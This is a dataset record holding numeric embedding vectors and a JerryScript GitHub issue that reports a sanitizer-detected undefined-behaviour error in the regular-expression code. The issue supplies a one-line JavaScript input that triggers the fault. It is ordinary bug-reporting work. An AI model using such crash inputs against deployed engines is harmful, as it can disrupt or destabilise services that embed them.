0.013300317339599133, 0.014795663766562939, -0.002994450042024255, 0.005105969496071339, -0.014652892015874386, -0.015359236858785152, 0.006195543333888054, -0.002385791391134262, -0.009392879903316498, -0.018154557794332504, -0.010843140073120594, 0.038262832909822464, 0.005098455119878054, 0.046708911657333374, 0.008754163980484009, 0.002119033597409725, 0.007292631547898054, 0.010369738563895226, -0.01415694784373045, 0.0017921613762155175, 0.004805397242307663, -0.01517137885093689, 0.008431049063801765, -0.014900864101946354, 0.0021227907855063677, 0.028043381869792938, 0.0058799427933990955, 0.014495091512799263, 0.003762787440791726, -0.0011355991009622812, 0.004516096320003271, -0.001593971624970436, -0.004948168992996216, -0.011985314078629017, 0.0003778285754378885, 0.019281702116131783, 0.0009491504752077162, 0.01251882966607809, 0.010587654076516628, 0.020784564316272736, 0.006853044964373112, 0.008400991559028625, -0.0405772402882576, 0.008746649138629436, 0.0015047392807900906, 0.012796859256923199, 0.020213477313518524, 0.00392998056486249, 0.011797457002103329, -0.005966356955468655, 0.02491743117570877, 0.015765009447932243, -0.009400393813848495, 0.03013235703110695, -0.017087526619434357, -0.01517137885093689, -0.001925540273077786, 0.018334900960326195, 0.004737768322229385, -0.00649611558765173, -0.006815473549067974, 0.010873197577893734, 0.007927590049803257, -0.005996414460241795, -0.006402186583727598, 0.014329777099192142, -0.01011425256729126, -0.0015301001258194447, -0.02470703050494194, 0.0016503289807587862, 0.004936897661536932, -0.022753311321139336, -0.007037145085632801, -0.0012407994363456964, -0.023730169981718063, 0.008333362638950348, 0.005297583993524313, -0.01844010129570961, 0.007563146762549877, 0.018785759806632996, -0.0052337124943733215, -0.00988882314413786, 0.02476714551448822, 0.01312748808413744, -0.001107420539483428, 0.0035824442747980356, -0.0073640174232423306, -0.00828076247125864, -0.021085135638713837, 0.026089662685990334, -0.013495689257979393, -0.005004526115953922, 0.0040877810679376125, -0.01904124580323696, 0.004016395192593336, -0.0011797456536442041, -0.0002914140932261944, -0.0000307029731629882, -0.018364958465099335, -0.016005465760827065, -0.01257894467562437, -0.005459141451865435, 0.003777816193178296, 0.037992317229509354, 0.004925625864416361, -0.012601487338542938, -0.03159013390541077, -0.000388160755392164, -0.0077472468838095665, -0.006142943166196346, 0.011496884748339653, 0.006127914413809776, 0.010625225491821766, 0.0019894118886440992, 0.02676595002412796, -0.028118524700403214, -0.004880540072917938, 0.0024496628902852535, -0.025233032181859016, -0.010955854319036007, -0.023444626480340958, -0.014690463431179523, -0.003740244545042515, 0.0021904194727540016, 0.0189210157841444, -0.00273332791402936, 0.008258219808340073, 0.017072496935725212, -0.012984716333448887, -0.00887439213693142, 0.01804935745894909, 0.0034396725241094828, 0.001270856591872871, -0.004640082363039255, -0.013691061176359653, 0.009272650815546513, 0.005462898872792721, -0.008784220553934574, -0.0062406291253864765, 0.0181695856153965, 0.013292803429067135, 0.017282897606492043, -0.009708479978144169, -0.02076953463256359, -0.013788746669888496, -0.019852790981531143, 0.00890444964170456, -0.00463256798684597, 0.018815815448760986, -0.0049707116559147835, 0.004264367278665304, -0.023519771173596382, 0.00019290625641588122, -0.019206559285521507, 0.04063735529780388, 0.018395015969872475, -0.0008026215364225209, 0.0016681754495948553, 0.011556998826563358, -0.02583417482674122, -0.007307660300284624, -0.01850021630525589, -0.03318316489458084, 0.015261550433933735, 0.003573051420971751, 0.04211015626788139, 0.008183076977729797, -0.01156451366841793, 0.0017508327728137374, -0.002665699226781726, 0.007352746091783047, -0.03387448191642761, 0.023249255493283272, 0.01454769168049097, -0.0009618308395147324, -0.0022505340166389942, 0.009250108152627945, -0.00556434178724885, -0.002434634370729327, -0.0044634961523115635, 0.016155753284692764, 0.016877125948667526, -0.008190590888261795, 0.0019039366161450744, 0.002917428268119693, -0.0004708180786110461, 0.0006889677024446428, 0.023970628157258034, 0.0015657930634915829, -0.0007716250256635249, -0.00850619189441204, 0.0159002672880888, 0.027442237362265587, 0.009422936476767063, 0.011391684412956238, -0.03225139155983925, 0.004572453908622265, 0.017643583938479424, 0.004910597577691078, -0.010685339570045471, -0.017823928967118263, -0.003201093291863799, 0.01052002515643835, -0.011121169663965702, -0.030628301203250885, 0.004756554029881954, -0.012706687673926353, -0.009227564558386803, 0.006090342998504639, 0.0032799935434013605, -0.016005465760827065, 0.008183076977729797, 0.011000940576195717, -0.01109862606972456, -0.013390488922595978, -0.01704244129359722, 0.016847068443894386 ]
1,785
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
<!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript "" . match ( /(?:(?=a)b){5}abcde/ ) ; ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.7.5.2/5): > If the size is an expression that is not an integer constant expression: if it occurs in a declaration at function prototype scope, it is treated as if it were replaced by *; otherwise, each time it is evaluated it shall have a value greater than zero
ubsan: jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4700/comments
0
2021-06-30T08:36:08
2021-06-30T08:36:08Z
https://github.com/jerryscript-project/jerryscript/issues/4700
933,445,635
4,700
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : ubsan: jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 Issue date: --- start body --- <!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript "" . match ( /(?:(?=a)b){5}abcde/ ) ; ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.7.5.2/5): > If the size is an expression that is not an integer constant expression: if it occurs in a declaration at function prototype scope, it is treated as if it were replaced by *; otherwise, each time it is evaluated it shall have a value greater than zero --- end body ---
3,955
[ -0.0034153813030570745, 0.0037314856890589, 0.00024184714129660279, 0.013567056506872177, 0.038019731640815735, 0.00802977941930294, -0.007542905863374472, 0.03970562294125557, -0.045809708535671234, -0.011997435241937637, -0.006209453567862511, 0.0004737024719361216, 0.00021879785344935954, 0.016553698107600212, 0.017818115651607513, 0.025608092546463013, -0.03976375609636307, 0.009657535701990128, -0.03522929549217224, -0.013537989929318428, 0.008792789652943611, 0.016989704221487045, -0.02648010477423668, 0.06150592863559723, -0.03238071873784065, 0.00048823602264747024, 0.013755992986261845, 0.005326541140675545, -0.01374145969748497, -0.019009865820407867, 0.013690591789782047, 0.005170305725187063, -0.0220183078199625, 0.013821394182741642, 0.03264232352375984, 0.010791150853037834, 0.03767092898488045, 0.055343709886074066, -0.011452427133917809, -0.003804153297096491, -0.005359241738915443, -0.034880489110946655, -0.0009664802346378565, 0.030491361394524574, 0.02621849998831749, 0.047321196645498276, 0.03397940844297409, 0.008422184735536575, -0.03395034372806549, 0.02230897918343544, -0.014955009333789349, -0.018573859706521034, 0.02278858609497547, -0.051884725689888, 0.010682149790227413, -0.03240978717803955, 0.015899689868092537, 0.017541978508234024, 0.04392034932971001, 0.024329140782356262, 0.018617460504174232, 0.011764897964894772, -0.009679336100816727, 0.0009301463724114001, -0.00233444944024086, 0.03583970293402672, -0.016277560964226723, 0.009679336100816727, 0.021625902503728867, 0.023006588220596313, -0.00869105476886034, -0.027293981984257698, 0.02024521678686142, 0.04647825285792351, -0.007811776362359524, -0.013537989929318428, 0.00986827164888382, 0.03197378292679787, -0.006136786192655563, 0.005064937751740217, -0.0068634627386927605, 0.01244070753455162, 0.005904249381273985, -0.00805157981812954, -0.023675132542848587, -0.0007684607990086079, 0.0024162004701793194, -0.06633106619119644, -0.012026501819491386, -0.017018772661685944, -0.018472125753760338, 0.042118191719055176, -0.010507747530937195, 0.013763259164988995, -0.013014782220125198, 0.0285002663731575, -0.030665762722492218, 0.006216720677912235, -0.04435635358095169, 0.01259330939501524, 0.010515013709664345, -0.0026905210688710213, -0.01661183312535286, 0.007862643338739872, 0.02879093773663044, 0.02153870277106762, 0.024983150884509087, -0.01075481716543436, 0.03034602478146553, 0.1039438545703888, 0.0051339720375835896, -0.00946859922260046, -0.03220631927251816, -0.015885155647993088, -0.0337178073823452, 0.026552772149443626, 0.012724111787974834, -0.0097156697884202, -0.034095678478479385, 0.049152422696352005, -0.027628254145383835, -0.012949381954967976, -0.004294660408049822, -0.014039397239685059, -0.036159440875053406, 0.019562140107154846, 0.019024400040507317, 0.006438356824219227, 0.021684037521481514, -0.03418288007378578, -0.02748291939496994, -0.024271007627248764, 0.022774051874876022, -0.028602000325918198, 0.021989241242408752, -0.01607409119606018, -0.03909521549940109, 0.02746838517487049, -0.00868378859013319, -0.04848387837409973, -0.026843443512916565, -0.008262315765023232, 0.020056281238794327, -0.004828767850995064, -0.038281336426734924, 0.00895992573350668, -0.018472125753760338, 0.030491361394524574, -0.005141238681972027, -0.014053930528461933, -0.012011968530714512, -0.003746019210666418, 0.024794213473796844, 0.0006281213136389852, 0.05548904463648796, -0.0073794033378362656, -0.010427813045680523, 0.03240978717803955, 0.022207245230674744, -0.008000711910426617, -0.023166457191109657, 0.0004505396354943514, -0.011336158961057663, -0.009134327992796898, -0.04522836580872536, 0.013690591789782047, -0.031043635681271553, 0.015391015447676182, 0.020841091871261597, 0.016001423820853233, -0.030520427972078323, 0.02259965054690838, 0.00013659254182130098, 0.04726306349039078, -0.014213799498975277, 0.0042692264541983604, -0.017207708209753036, 0.02621849998831749, 0.018355857580900192, -0.005519110709428787, 0.00623125396668911, -0.004272860009223223, 0.005439176224172115, -0.02908160723745823, 0.01608862541615963, -0.017076905816793442, 0.010856552049517632, -0.034357283264398575, 0.03706051781773567, -0.028325863182544708, 0.010544081218540668, -0.012491575442254543, -0.008887258358299732, -0.011365225538611412, 0.02979375049471855, 0.034909557551145554, -0.033369001001119614, -0.028863605111837387, -0.00921426247805357, 0.005519110709428787, 0.036188505589962006, -0.0076664406806230545, -0.005228439811617136, -0.00158597226254642, 0.0010291561484336853, 0.0007294018869288266, -0.013552523218095303, 0.005806148052215576, 0.012847647070884705, -0.007884443737566471, -0.01374872587621212, -0.03586876764893532, 0.007423004135489464, -0.02124803140759468, -0.01347258873283863, 0.007826309651136398, -0.005606311839073896, -0.01735304296016693, -0.030927367508411407, -0.011336158961057663, 0.02023068442940712, -0.011823032051324844, -0.0207538902759552, -0.02046322077512741, -0.04540276899933815, -0.012259038165211678, -0.01012260839343071, -0.0010237060487270355, -0.04121711105108261, -0.013131050392985344, 0.012774978764355183, -0.009504932910203934, -0.02751198597252369, 0.00635478924959898, 0.03790346533060074, 0.0194894727319479, -0.02459074556827545, -0.019881878048181534, 0.0012925764312967658, 0.01918426901102066, -0.006507391110062599, 0.026538237929344177, -0.04900708794593811, -0.02954667992889881, 0.013697858899831772, 0.012673243880271912, -0.03793253004550934, -0.02982281893491745, -0.012106436304748058, 0.028093326836824417, -0.023922201246023178, -0.011975634843111038, 0.00667452672496438, -0.028151461854577065, -0.018617460504174232, -0.022977521643042564, 0.0005754372105002403, 0.0181669220328331, -0.0068198624067008495, 0.002381683327257633, 0.02774452231824398, 0.033078331500291824, -0.04950122535228729, 0.02338446117937565, 0.039821892976760864, 0.025026751682162285, -0.04694332554936409, 0.010972820222377777, -0.017847184091806412, -0.03833946958184242, 0.05051857605576515, -0.05888989195227623, -0.0064310901798307896, 0.018544793128967285, 0.0060168844647705555, 0.014133865013718605, -0.01140882633626461, 0.0441238172352314, 0.005337441340088844, 0.003876820905134082, 0.016742635518312454, 0.023457128554582596, 0.01896626502275467, 0.020666690543293953, -0.009432265534996986, -0.011830299161374569, 0.013588856905698776, -0.014955009333789349, 0.003967655822634697, -0.032293520867824554, -0.014635271392762661, -0.026378368958830833, -0.002138246549293399, 0.018486659973859787, -0.01074755098670721, 0.004062123596668243, 0.0029339578468352556, -0.03223538398742676, -0.01999814622104168, 0.012375306338071823, -0.03223538398742676, -0.03679891675710678, -0.015071277506649494, 0.01869012787938118, -0.05482050031423569, -0.019649341702461243, -0.0013152851024642587, -0.03522929549217224, 0.005192106124013662, -0.012891246937215328, 0.03578156977891922, -0.04130431264638901, 0.005606311839073896, -0.02908160723745823, -0.01077661756426096, -0.017222240567207336, 0.05205912888050079, -0.008007979020476341, -0.007052398752421141, -0.0013034766307100654, -0.044472623616456985, -0.043484341353178024, -0.04272859916090965, 0.023762332275509834, 0.05493677034974098, -0.005119438283145428, -0.039037082344293594, 0.037205856293439865, -0.03836853802204132, 0.008654721081256866, 0.019329603761434555, -0.039560288190841675, -0.04104270786046982, 0.009127060882747173, -0.016728101298213005, -0.0363338440656662, -0.028950806707143784, 0.014707939699292183, 0.031218037009239197, -0.010435079224407673, -0.010740283876657486, -0.012360773049294949, -0.01604502461850643, -0.0042292592115700245, 0.01284037996083498, -0.006870729848742485, 0.005006803665310144, 0.024430876597762108, 0.0018248672131448984, -0.002701421268284321, 0.0009383214637637138, 0.02052135393023491, 0.0048251342959702015, 0.004905068781226873, 0.043687812983989716, -0.0336887389421463, -0.062145404517650604, -0.01610315963625908, 0.02434367500245571, 0.035374630242586136, -0.0003656093031167984, -0.0194458719342947, 0.006518291309475899, 0.024721546098589897, 0.024532610550522804, -0.024314606562256813, -0.002795889275148511, 0.004381861537694931, -0.02278858609497547, -0.01604502461850643, -0.017745448276400566, 0.02672717534005642, -0.0009169753757305443, -0.006794428452849388, -0.012237237766385078, -0.004054856952279806, 0.008538452908396721, -0.005344708450138569, -0.016466498374938965, 0.01662636548280716, -0.02826773002743721, 0.019097067415714264, -0.004000355955213308, -0.05543091148138046, -0.000725768506526947, 0.02281765267252922, -0.02460527792572975, 0.028340397402644157, 0.039850957691669464, -0.006147686392068863, -0.010536814108490944, 0.01864652894437313, -0.0675518810749054, -0.06098272278904915, -0.01863199472427368, 0.017701847478747368, -0.02698877826333046, -0.03267139196395874, 0.008930858224630356, -0.034647952765226364, 0.008923592045903206, -0.03863014280796051, 0.025782493874430656, -0.0031846612691879272, 0.0168589036911726, 0.025273820385336876, -0.028732802718877792, -0.04025789722800255, 0.015550884418189526, 0.005024970509111881, 0.03961842134594917, 0.006071384996175766, -0.01713504083454609, 0.014642538502812386, 0.05051857605576515, 0.02515755221247673, 0.038281336426734924, -0.03496769070625305, -0.030520427972078323, 0.009432265534996986, -0.03278765827417374, -0.011997435241937637, 0.024532610550522804, 0.0014006696874275804, 0.014213799498975277, -0.014693406410515308, -0.03133430704474449, 0.03502582386136055, 0.0023580663837492466, -0.009672068990767002, -0.05790161341428757, 0.014155665412545204, -0.0030538595747202635, 0.053076475858688354, 0.005936949979513884, -0.02694517746567726, -0.021204430609941483, -0.013821394182741642, -0.016466498374938965, 0.011219890788197517, 0.03005535528063774, 0.036188505589962006, -0.04203099012374878, -0.03656638041138649, 0.007343069650232792, -0.0004033056611660868, -0.04235072806477547, 0.025579025968909264, -0.019344137981534004, 0.01838492415845394, 0.0011535994708538055, 0.01584155485033989, -0.001634114538319409, 0.0037932530976831913, 0.041885655373334885, -0.03793253004550934, -0.023805933073163033, -0.014591671526432037, -0.004094824194908142, 0.02537555620074272, -0.02178577147424221, 0.012673243880271912, 0.0015305631095543504, 0.0009024417959153652, -0.0017531078774482012, 0.039037082344293594, 0.03209004923701286, -0.04304833710193634, -0.005442809779196978, -0.04714679345488548, -0.0017440244555473328, 0.0013025682419538498, 0.0055663445964455605, 0.022207245230674744, -0.001905710087157786, -0.005308374296873808, -0.014686139300465584, -0.0008883624686859548, -0.0052139065228402615, -0.021146295592188835, 0.008843657560646534, -0.02931414358317852, -0.04176938533782959, 0.035897836089134216, 0.01866106130182743, -0.006169486325234175, 0.005402842536568642, 0.011772165074944496, 0.011503294110298157, 0.032293520867824554, 0.003611583961173892, 0.010849284939467907, -0.031247105449438095, -0.04278673231601715, 0.012934847734868526, -0.0006898888386785984, -0.027148647233843803, 0.004796067252755165, -0.0049668364226818085, 0.0006721760728396475, 0.008916324935853481, -0.04130431264638901, 0.02932867780327797, 0.027308516204357147, 0.00511217163875699, -0.03278765827417374, -0.033892206847667694, 0.05810508131980896, -0.017992518842220306, -0.022643251344561577, 0.00044236454414203763, -0.04560624063014984, 0.00623125396668911, -0.0016668150201439857, -0.0233117938041687, -0.03005535528063774, 0.0036570013035088778, -0.008167847990989685, 0.03063669614493847, 0.013080183416604996, -0.015143945813179016, -0.01127802487462759, -0.03084016591310501, 0.029459480196237564, 0.018021585419774055, -0.02306472323834896, 0.012128236703574657, 0.0016849819803610444, -0.01584155485033989, -0.014737006276845932, -0.03197378292679787, 0.023791400715708733, 0.0006117710727266967, 0.039531219750642776, -0.03322366625070572, -0.015332881361246109, -0.017164107412099838, 0.04429822042584419, 0.0030683930963277817, -0.0003572070854716003, 0.021887507289648056, 0.05011163651943207, -0.0246343445032835, 0.022628717124462128, -0.012011968530714512, 0.019780144095420837, -0.022628717124462128, 0.025288354605436325, 0.019678408280014992, 0.025549957528710365, -0.017803583294153214, -0.005272040609270334, 0.010674882680177689, -0.0011763081420212984, -0.017323976382613182, -0.00493413582444191, -0.01268777810037136, 0.018108787015080452, -0.00974473636597395, -0.005726213566958904, 0.002910340903326869, -0.013726925477385521, 0.001843034173361957, -0.010711216367781162, -0.0311599038541317, -0.027584653347730637, 0.009236062876880169, 0.03961842134594917, -0.0518556609749794, 0.0024198340252041817, 0.003960388712584972, 0.0022417979780584574, 0.002408933825790882, -0.029488546773791313, -0.009374131448566914, -0.0011690413812175393, -0.01390132773667574, 0.003402664326131344, -0.00363156758248806, -0.014540803618729115, 0.038223203271627426, -0.030723897740244865, -0.015260213986039162, 0.021989241242408752, -0.008625654503703117, -0.024721546098589897, 0.005926049780100584, -0.001139974338002503, 0.022396180778741837, -0.036450110375881195, -0.0016268477775156498, 0.0019783778116106987, -0.009548533707857132, -0.0059769172221422195, 0.0030284258536994457, -0.007346703205257654, -0.008291383273899555, 0.018472125753760338, 0.046565454453229904, -0.025230219587683678, 0.028907205909490585, 0.016277560964226723, 0.0025869696401059628, -0.011895700357854366, -0.03427008166909218, 0.024779681116342545, 0.006521924864500761, 0.018065186217427254, -0.00481060054153204, 0.03145057335495949, -0.0363338440656662, 0.026538237929344177, 0.03287485986948013, -0.00660912599414587, -0.017512911930680275, -0.0075211054645478725, -0.0021891139913350344, 0.0168589036911726, -0.020928293466567993, 0.02852933295071125, 0.002543369075283408, -0.062087271362543106, -0.027032379060983658, -0.015565418638288975, -0.00999180693179369, 0.04825134202837944, -0.02438727580010891, -0.04194378852844238, -0.013683324679732323, -0.002247248077765107, -0.014351868070662022, -0.002830406418070197, 0.018312256783246994, -0.011343426071107388, -0.0022563317324966192, 0.03656638041138649, 0.004581697750836611, 0.01414839830249548, -0.004636198282241821, -0.033078331500291824, -0.00771730812266469, 0.03031695820391178, -0.014620738103985786, -0.0030320591758936644, -0.012397106736898422, -0.014439068734645844, 0.004828767850995064, 0.0084076514467597, 0.018297722563147545, 0.013676058501005173, -0.0002463888667989522, -0.00010718483827076852, 0.012949381954967976, 0.01557995192706585, -0.00584248173981905, -0.004360061138868332, 0.03191564604640007, 0.07069112360477448, -0.006994264665991068, -0.00790624413639307, -0.04871641471982002, -0.013261852785944939, -0.01738210953772068, -0.02175670489668846, 0.030491361394524574, -0.03921148180961609, -0.03136337175965309, 0.004963202867656946, -0.0014896875945851207, 0.026654506102204323, -0.026596372947096825, -0.009541267529129982, 0.0009864638559520245, 0.005853381939232349, -0.013799593783915043, -0.01065308228135109, -0.0168298352509737, 0.005439176224172115, -0.008582053706049919, 0.02020161598920822, -0.00695066386833787, 0.014606204815208912, 0.008327716961503029, 0.025288354605436325, 0.011546894907951355, -0.002556085819378495, -0.019082535058259964, 0.01736757718026638, 0.010042673908174038, 0.012891246937215328, 0.010558614507317543, 0.027875324711203575, 0.05293114110827446, 0.016771702095866203, 0.012927581556141376, 0.0012807679595425725, 0.04223445802927017, -0.01127802487462759, -0.019533073529601097, 0.00278862239792943, -0.024430876597762108, -0.013232785277068615, -0.022439781576395035, -0.0181378535926342, 0.014039397239685059, 0.017527446150779724, 0.008996259421110153, 0.0061876531690359116, 0.02046322077512741, 0.019765609875321388, -0.014882341958582401, 0.01895173266530037, -0.0220037754625082, 0.02460527792572975, 0.002774088876321912, -0.0415949821472168, 0.013283653184771538, 0.01815238781273365, -0.0056281122379004955, -0.0024034837260842323, 0.0011899333912879229, -0.02929961122572422, -0.03220631927251816, -0.035374630242586136, 0.010137141682207584, -0.024532610550522804, 0.013523456640541553, 0.02229444496333599, 0.006180386524647474, 0.008770989254117012, -0.03714771941304207, -0.012862180359661579, 0.0006808053585700691, 0.0034480816684663296, -0.04726306349039078, 0.026291169226169586, 0.004120257683098316, -0.016204893589019775, -0.030927367508411407, 0.0027377549558877945, -0.009817404672503471, -0.0026905210688710213, -0.000887908274307847, -0.023776866495609283, 0.01362519059330225, -0.025491824373602867, -0.010202542878687382, -0.0067835282534360886, -0.03479328751564026, 0.010544081218540668, -0.007310369051992893, 0.01918426901102066, 0.023413527756929398, 0.0026596372481435537, -0.019373204559087753, 0.0032736791763454676, 0.02935774438083172, -0.00550094386562705, 0.005210272967815399, 0.006630926392972469, 0.010478680022060871, 0.013210984878242016, -0.0021963808685541153, 0.006732660811394453, 0.02434367500245571, -0.010965554043650627, 0.017963452264666557, -0.0024107503704726696, 0.009919138625264168, 0.0026650873478502035, 0.0076664406806230545, -0.012506108731031418, -0.04851294681429863, 0.001030064420774579, -0.005718946922570467, -0.022090977057814598, -0.013465321622788906, 0.004040323197841644, 0.012520642019808292, 0.00022356667614076287, -0.018544793128967285, 0.017294909805059433, -0.0007543814135715365, 0.014424535445868969, 0.02127709798514843, -0.007026965264230967, 0.015347415581345558, -0.011924766935408115, 0.017789049074053764, -0.015986891463398933, -0.030752964317798615, -0.06295928359031677, 0.021611370146274567, 0.003055676119402051, -0.013777793385088444, -0.03717678785324097, -0.011445160023868084, 0.011888433247804642, -0.018762797117233276, -0.010791150853037834, 0.03546183183789253, 0.0065146577544510365, -0.030229756608605385, 0.017541978508234024, 0.008320449851453304, -0.015754353255033493, -0.007375770248472691, 0.0005613578832708299, -0.011089088395237923, 0.017730915918946266, 0.005798881407827139, -0.004752466455101967, -0.007746375165879726, -0.010660349391400814, 0.02021615020930767, -0.010863819159567356, 0.0070705655962228775, -0.007891710847616196, 0.010326078161597252, 0.030026286840438843, -0.003302746219560504, 0.02259965054690838, 0.010384212248027325, -0.02411113865673542, 0.010347878560423851, 0.013487122021615505, 0.02383500151336193, 0.0015169379767030478, 0.021872973069548607, 0.013726925477385521, -0.036682646721601486, -0.01349438913166523, -0.008167847990989685, -0.007724574767053127, -0.023021122440695763, 0.04037416726350784, -0.006027784664183855, 0.037002384662628174, -0.00583158154040575, 0.04778626933693886, -0.014170198701322079, 0.0051376051269471645, -0.0007670982740819454, 0.005195739679038525, -0.012302638962864876, -0.003268229076638818, -0.010449613444507122, 0.009766536764800549, -0.021989241242408752, -0.043455276638269424, 0.013290919363498688, 0.021887507289648056, -0.02804972603917122, 0.0011999252019450068, -0.018355857580900192, -0.025230219587683678, -0.00045508137554861605, 0.009984539821743965, -0.012869447469711304, -0.020608555525541306, 0.027061445638537407, -0.008073380216956139, 0.0032064616680145264, -0.034880489110946655, 0.03063669614493847, -0.015463683754205704, -0.019024400040507317, -0.050983648747205734, 0.002425283892080188, -0.0037096852902323008, -0.017018772661685944, -0.0005527285975404084, 0.03970562294125557, 0.0181378535926342, 0.019344137981534004, 0.019823744893074036, -0.01074755098670721, 0.00481060054153204, 0.016510097309947014, 0.006376589182764292, -0.0036079506389796734, 0.024009402841329575, -0.017774516716599464, -0.020957360044121742, 0.028994405642151833, -0.025055818259716034, 0.01610315963625908, -0.03816507011651993, 0.00871285516768694, -0.01863199472427368, 0.002000177977606654, -0.007695507723838091, -0.02384953387081623, -0.02360246330499649, -0.003557083196938038, 0.024794213473796844, -0.011052754707634449, 0.0067181275226175785, -0.02098642662167549, 0.005998717620968819, -0.010718483477830887, -0.02355886436998844, -0.020041747018694878, -0.045751575380563736, 0.01414839830249548, -0.007448437623679638, 0.02180030569434166, 0.035403694957494736, -0.019329603761434555, 0.03316553309559822, 0.03351433575153351, 0.0031138102058321238, -0.026610907167196274, -0.029154274612665176, -0.006060484796762466, -0.006038684863597155, -0.0415949821472168, 0.0026650873478502035, 0.007350336294621229, 0.05284393951296806, 0.0029194243252277374, 0.0135961240157485, -0.03819413483142853, 0.006917963735759258, -0.010544081218540668, -0.01231717225164175, -0.023398995399475098, -0.02149510197341442, -0.011067287996411324, 0.023486195132136345, -0.00013557064812630415, -0.0036969685461372137, 0.00870558898895979, -0.02097189426422119, -0.006910697091370821, 0.011735831387341022, -0.008349517360329628, -0.006794428452849388, -0.01103095430880785, -0.03755465894937515, -0.013312719762325287, 0.01130709145218134, 0.01760011352598667, -0.03284579515457153, 0.0010927403345704079, 0.011321625672280788, 0.02049228735268116, -0.0363338440656662, -0.0060205175541341305, 0.0027105046901851892, -0.03735119104385376, -0.005951483268290758, -0.006336621940135956, -0.0002434367488604039, -0.03220631927251816, 0.02049228735268116, 